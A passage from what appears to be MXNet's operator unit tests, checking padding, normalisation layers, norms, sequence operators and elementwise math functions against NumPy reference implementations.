exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
